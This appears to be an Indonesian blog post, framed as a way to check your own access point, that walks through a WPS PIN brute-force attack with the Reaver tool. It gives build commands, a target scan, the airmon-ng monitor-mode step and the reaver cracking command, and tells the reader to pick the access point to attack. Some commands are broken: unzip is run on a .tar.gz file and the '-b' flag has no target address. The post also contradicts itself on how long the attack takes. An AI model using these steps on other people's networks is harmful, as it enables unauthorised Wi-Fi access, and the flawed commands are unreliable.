Breaking News

  • " World Ocean Day- PAPUA BARAT"
  • Sejarah Bento, Makanan Kotak Khas Jepang
  • Usal Usul Dan Perkembangan Rantang
  • Estcopato: Irama Anak Pantai Timur Papua
  • Hari Ini Dalam Sejarah: 10 Juni

Mengecek Bug WPS PIN Akses Point Kamu Menggunakan Reaver Dan WPScrack

Sebuah sistem dalam akses point yang ada fitur WPS , atau WiFi Protected Setup , diketahui selama lebih dari setahun oleh TNS , akhirnya dieksploitasi dengan konsep kode . Kedua TNS , penemu bug exploit Stefan braindump telah menciptakan masing-masing "reaver" and "wpscrack" program untuk mengeksploitasi kerentanan WPS . Dari mengeksploitasi , password WPA dapat dipulihkan hampir seketika di teks biasa setelah serangan pada akses point WPS dimulai , yang biasanya memakan waktu 2-10 jam ( tergantung pada program yang Anda gunakan ).

Ini memanfaatkan kelemahan WPS melalui brute force attack cerdas untuk PIN WPS statis . Dengan menebak PIN , router akan benar-benar melemparkan kembali , apakah empat digit pertama ( dari delapan ) benar . Kemudian , jumlah akhir adalah nomor memeriksa digunakan untuk memenuhi sebuah algoritma . Hal ini dapat dimanfaatkan untuk brute force PIN WPS , dan memungkinkan pemulihan password WPA dalam jumlah yang sangat singkat , yang bertentangan dengan serangan standar pada WPA .

    Unzip Reaver.

    unzip reaver-1.3.tar.gz

    Change to the Reaver directory.

    cd reaver-1.3

    Configure, compile and install the application.

    ./configure && make && sudo make install

    Scan akses point yang ingin diserang, dan kopi MAC address target (XX:XX:XX:XX:XX:XX).

    sudo iwlist scan wlan0

    set devices wifi kamu ke monitor mode.

    sudo airmon-ng start wlan0

    jalankan tools untuk membongkar kode akses point kamu.

    reaver -i mon0 -b -vv

    dan tunggu sampai proses cracking selesai.